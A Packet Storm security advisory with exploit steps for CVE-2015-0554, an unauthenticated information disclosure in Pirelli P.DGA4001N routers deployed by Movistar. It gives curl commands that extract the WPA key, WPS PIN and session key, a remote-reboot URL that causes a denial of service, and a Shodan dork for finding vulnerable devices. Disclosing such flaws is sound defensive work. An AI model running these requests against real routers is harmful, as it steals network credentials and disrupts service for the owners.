what you don't know can hurt you

Pirelli ADSL2/2+ Wireless Router P.DGA4001N Information Disclosure

Pirelli ADSL2/2+ Wireless Router P.DGA4001N Information Disclosure
Posted Jan 6, 2015
Authored by Eduardo Novella

ADB BroadBand Pirelli ADSL2/2+ wireless router version P.DGA4001N suffers from multiple unauthenticated remote information disclosure vulnerabilities.

tags | exploit, remote, vulnerability, info disclosure
advisories | CVE-2015-0554
MD5 | d762c843c734459eabf59293eac40c1f

Pirelli ADSL2/2+ Wireless Router P.DGA4001N Information Disclosure

Change Mirror Download
- Title:

CVE-2015-0554 ADB BroadBand Pirelli ADSL2/2+ Wireless Router P.DGA4001N remote information disclosure
HomeStation Movistar

- Author:

Eduardo Novella @enovella_
ednolo[@]inf.upv[dot]es

- Version:

Tested on firmware version PDG_TEF_SP_4.06L.6


- Shodan dork :
+ "Dropbear 0.46 country:es" ( From now on it looks like not working on this way)


- Summary:

HomeStation movistar has deployed routers manufactured by Pirelli. These routers are vulnerable to fetch HTML code from any
IP public over the world. Neither authentication nor any protection to avoid unauthorized extraction of sensitive information.


- The vulnerability and the way to exploit it:


$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "WLAN_"
<option value='0'>WLAN_DEAD</option>

$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var wpapskkey"
var wpaPskKey = 'IsAklFHhFFui1sr9ZMqD';

$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var WscDevPin"
var WscDevPin = '12820078';

$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var sessionkey"
var sessionKey='1189641421';

$ curl -s http://${IP_ADDRESS}/wlcfg.html | grep -i "bssid:" -A 3
<td width="50">BSSID:</td>
<td>
DC:0B:1A:XX:XX:XX
</td>



# Rebooting the router remotely and provoking a Denial of Service
#-----------------------------------------------------------------
http://${IP_ADDRESS}/resetrouter.html

We can observe at the source:
<!-- hide

var sessionKey='846930886';
function btnReset() {
var loc = 'rebootinfo.cgi?';

loc += 'sessionKey=' + sessionKey;

var code = 'location="' + loc + '"';
eval(code);
}

// done hiding -->


http://${IP_ADDRESS}/rebootinfo.cgi?sessionKey=233665123


# All the information what we can fetch from.
#----------------------------------------------
webs$ ls
adslcfgadv.html diagpppoe.html ipv6lancfg.html qoscls.html statsatmreset.html
adslcfgc.html dlnacfg.html js qosqmgmt.html statsifc.html
adslcfg.html dnscfg.html jsps qosqueueadd.html statsifcreset.html
adslcfgtone.html dnsproxycfg.html lancfg2.html qsmain.html statsmocalanreset.html
algcfg.html dsladderr.html languages quicksetuperr.html statsmocareset.html
APIS dslbondingcfg.html lockerror.html quicksetup.html statsmocawanreset.html
atmdelerr.html enblbridge.html logconfig.html quicksetuptesterr.html statsvdsl.html
backupsettings.html enblservice.html logintro.html quicksetuptestsucc.html statsvdslreset.html
berrun.html engdebug.html logobkg.gif rebootinfo.html statswanreset.html
berstart.html ethadderr.html logoc.gif resetrouter.html statsxtmreset.html
berstop.html ethdelerr.html logo_corp.gif restoreinfo.html storageusraccadd.html
certadd.html footer.html logo.html routeadd.html stylemain.css
certcaimport.html hlpadslsync.html logomenu.gif rtdefaultcfgerr.html threeGPIN.html
certimport.html hlpatmetoe.html main.html rtdefaultcfg.html todadd.html
certloadsigned.html hlpatmseg.html menuBcm.js scdmz.html tr69cfg.html
cfgatm.html hlpethconn.html menu.html scinflt.html updatesettings.html
cfgeth.html hlppngdns.html menuTitle.js scmacflt.html upload.html
cfgl2tpac.html hlppnggw.html menuTree.js scmacpolicy.html uploadinfo.html
cfgmoca.html hlppppoasess.html mocacfg.html scoutflt.html upnpcfg.html
cfgptm.html hlppppoeauth.html multicast.html scprttrg.html url_add.html
colors.css hlppppoeconn.html natcfg2.html scripts util.js
config.json.txt hlppppoeip.html ntwksum2.html scvrtsrv.html wanadderr.html
css hlptstdns.html omcidownload.html seclogintro.html wancfg.html
ddnsadd.html hlpusbconn.html omcisystem.html snmpconfig.html wlcfgadv.html
defaultsettings.html hlpwlconn.html password.html sntpcfg.html wlcfg.html
dhcpinfo.html html portmapadd.html standby.html wlcfgkey.html
diag8021ag.html ifcdns.html portmapedit.html StaticIpAdd.html wlmacflt.html
diagbr.html ifcgateway.html portName.js StaticIpErr.html wlrefresh.html
diag.html images pppoe.html statsadslerr.html wlsecurity.html
diagipow.html index.html pradd.html statsadsl.html wlsetup.html
diaglan.html info.html ptmadderr.html statsadslreset.html wlwapias.html
diagmer.html ipoacfg.html ptmdelerr.html statsatmerr.html xdslcfg.html
diagpppoa.html ippcfg.html pwrmngt.html statsatm.html



+ Conclusion:

This vulnerability can be exploited remotely and it should be patched as soon as possible. An attacker could be monitoring our network
or even worse being a member of a botnet without knowledge of it.
First mitigation could be either try to update the last version for these routers or install 3rd parties firmwares as OpenWRT or DDWRT on them.



+ References:

http://packetstormsecurity.com/files/115663/Alpha-Networks-ADSL2-2-Wireless-Router-ASL-26555-Password-Disclosure.html



+ Timeline:

2013-04-xx Send email to Movistar and Pirelli
2015-01-05 Full disclosure

Login or Register to add favorites

File Archive:

June 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    35 Files
  • 2
    Jun 2nd
    14 Files
  • 3
    Jun 3rd
    40 Files
  • 4
    Jun 4th
    22 Files
  • 5
    Jun 5th
    1 Files
  • 6
    Jun 6th
    1 Files
  • 7
    Jun 7th
    19 Files
  • 8
    Jun 8th
    14 Files
  • 9
    Jun 9th
    39 Files
  • 10
    Jun 10th
    20 Files
  • 11
    Jun 11th
    22 Files
  • 12
    Jun 12th
    2 Files
  • 13
    Jun 13th
    1 Files
  • 14
    Jun 14th
    32 Files
  • 15
    Jun 15th
    34 Files
  • 16
    Jun 16th
    9 Files
  • 17
    Jun 17th
    33 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close